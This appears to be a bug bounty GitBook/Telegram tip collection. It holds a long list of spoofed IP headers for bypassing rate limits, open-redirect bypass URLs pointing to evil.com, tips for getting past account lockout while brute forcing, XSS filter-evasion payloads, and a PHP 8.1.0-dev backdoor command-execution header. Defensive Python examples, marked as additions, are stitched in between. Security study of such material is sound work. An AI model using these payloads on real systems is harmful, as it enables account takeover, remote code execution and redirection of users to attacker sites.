Bug Bounty - GitBook

Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1

For more, join the channel (: https://t.me/rootdr_research #Web #Payloads #bugbounty
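
The defensive counterpart to the header list above, as an added example that is not part of the original post: a rate limiter that keys on the TCP peer address and reads `X-Forwarded-For` only when the peer is one of its own proxies. The `10.0.0.0/8` proxy range, the sample addresses and the `Limiter` class are assumptions constructed for illustration.

```python
import ipaddress
from collections import Counter

# Assumption: our own reverse proxies live in this constructed range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def is_trusted(addr):
    """True only for a syntactically valid address inside a trusted proxy range."""
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)

def client_ip(peer_addr, headers):
    """Pick the rate-limit key. `headers` maps lower-cased names to values."""
    if not is_trusted(peer_addr):
        # Direct connection: every client-supplied forwarding header is ignored.
        return peer_addr
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    # Our proxies append on the right, so walk right to left and stop at the
    # first hop that is not ours. Anything further left is client-controlled.
    for hop in reversed(hops):
        if is_trusted(hop):
            continue
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            break  # malformed chain: fall back to the proxy's own address
    return peer_addr

class Limiter:
    """Fixed-count limiter (no time window, to keep the example short)."""
    def __init__(self, limit):
        self.limit, self.hits = limit, Counter()

    def allow(self, peer_addr, headers):
        key = client_ip(peer_addr, headers)
        self.hits[key] += 1
        return self.hits[key] <= self.limit

def demo():
    """Five direct requests, each carrying a different header from the list above."""
    lim = Limiter(limit=3)
    names = ["x-forwarded-for", "x-real-ip", "client-ip", "true-client-ip", "x-originating-ip"]
    return [lim.allow("203.0.113.7", {n: "127.0.0.1"}) for n in names]
```

Because the key never comes from a header the client can set, rotating through the header names does not open a new bucket.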

If the target does not cache the DNS query, then use DNS rebinding to bypass the security mechanism. For example: the server checks that attacker.com does not point to localhost, and then the server makes a request to attacker.com. Use DNS rebinding to bypass it. First set the IP to something valid, then when the DNS request comes for attacker.com, quickly change it to localhost.
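
Why the check described above fails and how a server closes the gap, as an added example that is not part of the original post: the weak function resolves the name once to validate and again to connect, while the hardened one resolves once and connects to the validated address. The `FlippingResolver` stub, the host name `rebind.example` and the sample addresses are constructed assumptions so the code runs offline.

```python
import ipaddress

class FlippingResolver:
    """Constructed stand-in for a name whose answer changes between lookups."""
    def __init__(self, answers):
        self.answers, self.calls = list(answers), 0

    def resolve(self, host):
        ip = self.answers[min(self.calls, len(self.answers) - 1)]
        self.calls += 1
        return [ip]

def is_allowed(ip):
    """Only globally routable addresses; loopback, private and link-local are refused."""
    return ipaddress.ip_address(ip).is_global

def check_then_fetch(host, resolver):
    """Weak pattern: the check and the connection each resolve the name."""
    if not all(is_allowed(ip) for ip in resolver.resolve(host)):
        raise PermissionError("destination not allowed")
    # An HTTP client that is handed the host name resolves it again here.
    return resolver.resolve(host)[0]

def resolve_validate_pin(host, resolver):
    """Hardened pattern: one lookup, every answer validated, connect to that IP."""
    ips = resolver.resolve(host)
    if not ips or not all(is_allowed(ip) for ip in ips):
        raise PermissionError("destination not allowed")
    # The caller connects to this address and sends the original name in the
    # Host header and SNI, so no second lookup can change the destination.
    return ips[0]

def demo():
    answers = ["93.184.216.34", "127.0.0.1"]  # constructed: public first, loopback after
    weak = check_then_fetch("rebind.example", FlippingResolver(answers))
    pinned = resolve_validate_pin("rebind.example", FlippingResolver(answers))
    return weak, pinned
```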

🚀 A look at up-to-date bypasses for Open Redirect
Here I want to tell you about a set of new and creative bypasses for the Open Redirect bug that make bypassing easy!

🔥 First of all, the Subdomain Overloading technique
If the site insists that only its own domain is valid, you can use a fake subdomain:
site.com/login?url=https://site.com.evil.com
Here we put the main domain first, but the malicious domain is hidden inside it and you can redirect easily.

🔥 Playing with TLD and Encoding
This is another great method for bypassing:
site.com/login?url=https://evil.com/%2E%2E%2E%2F
or with a hash:
site.com/login?url=https://evil.com#site.com
This way the server thinks the main domain is valid.

🔥 Unicode!
site.com/login?url=https://evil.com%5Csite.com
or:
site.com/login?url=https://evil.com%EF%BC%8Fsite.com

🔥 Open URL Wrapping
If you see the site being strict, use intermediary links. For example, put Google in the middle:
site.com/login?url=https://google.com/url?q=https://evil.com
This works in a lot of places.

🔥 Data URL Injection
And the final masterpiece! Using a Data URL you can shove malicious code straight down the site's throat:
site.com/login?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnU3VwZXIhJyk8L3NjcmlwdD4=
You can attack very professionally and show its impact.

💡 Summary
Test these bypasses:
Fake subdomain
Encoding such as %2E and %5C
Intermediary links such as Google
Data URL for injecting data

Don't forget: if you find a new technique, comment here so others can learn too! 🧑‍💻
The bug bounty world means creativity!
https://t.me/rootdr_research #web #bugbountt
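
A redirect-target validator that holds against each `url=` value in the post above, as an added example that is not part of the original post: it parses the target, requires `https`, and compares the host by exact match against an allowlist. The function name, the allowlist containing only the post's placeholder `site.com`, and the two legitimate sample targets are assumptions.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"site.com"}  # the post's placeholder domain, used as the allowlist

def is_safe_redirect(target):
    """Validate an already URL-decoded redirect parameter."""
    # Backslashes, whitespace and control characters are parsed differently by
    # browsers and server libraries, so refuse them outright.
    if not target or any(c == "\\" or ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        return False
    try:
        parts = urlsplit(target)
        host = parts.hostname
    except ValueError:
        # Raised, for example, when the host contains a character that
        # normalises to "/" such as U+FF0F.
        return False
    if not parts.scheme and not parts.netloc:
        # Same-site path only; "//host" and "///host" are treated as other hosts.
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme != "https" or "@" in parts.netloc:
        return False
    return host in ALLOWED_HOSTS  # exact match, never prefix, suffix or substring

# The url= values from the post above, plus two legitimate targets (constructed).
SAMPLES = [
    "https://site.com.evil.com",
    "https://evil.com/%2E%2E%2E%2F",
    "https://evil.com#site.com",
    "https://evil.com%5Csite.com",
    "https://evil.com%EF%BC%8Fsite.com",
    "https://google.com/url?q=https://evil.com",
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgnU3VwZXIhJyk8L3NjcmlwdD4=",
    "https://site.com/account",
    "/dashboard",
]

def verdicts():
    """Decode once, as a web framework does, then validate each sample."""
    return {s: is_safe_redirect(unquote(s)) for s in SAMPLES}
```

The intermediary-link case is refused only because `google.com` is not on the allowlist; allowlisting a host that itself redirects anywhere reopens the problem.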

You've been brute forcing an account but suddenly the account is locked. Try these methods to bypass the locking mechanism:
1. Try to spoof the IP address using X-headers, hop-by-hop headers, etc.
2. Use verb tampering to your advantage.
3. Try changing the request type.
4. Sometimes using CRLF or a null byte helps you out.
And etc.

<42 foo="<img src=x onerror=alert(1)//">test</42>

<22 foo="<img src=x onerror='alert(1)'">test</22>
This payload may help you to bypass a WAF or trick sanitizers.

List of 1400 write-ups and reports from the HackerOne site A great list where you can access a bank of write-ups based on your needs. A lot of time has definitely been spent on this file, I hope you get the most out of it.

Bypassing XSS WAF protection using invisible separators before or after the function name
<IMG/SRC/ONERROR = ALERT (1337)>
<svg/onload = alert (2)>
Explanation: You can insert invisible separator characters (for example, Zero Width No-Break Space, Zero Width Space or non-breaking space) before or after the function name (for example, Alert). This helps to get around filters and WAFs (Web Application Firewalls), which do not expect such characters inside the function name and therefore do not block such attacks. http://GitBook_s.t.me


Find a server running PHP 8.1.0-dev ❓ 🚨 Check for easy RCE 🚨 👇 Payload: User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbountytips #bugbounty


#Reports @GitBook_s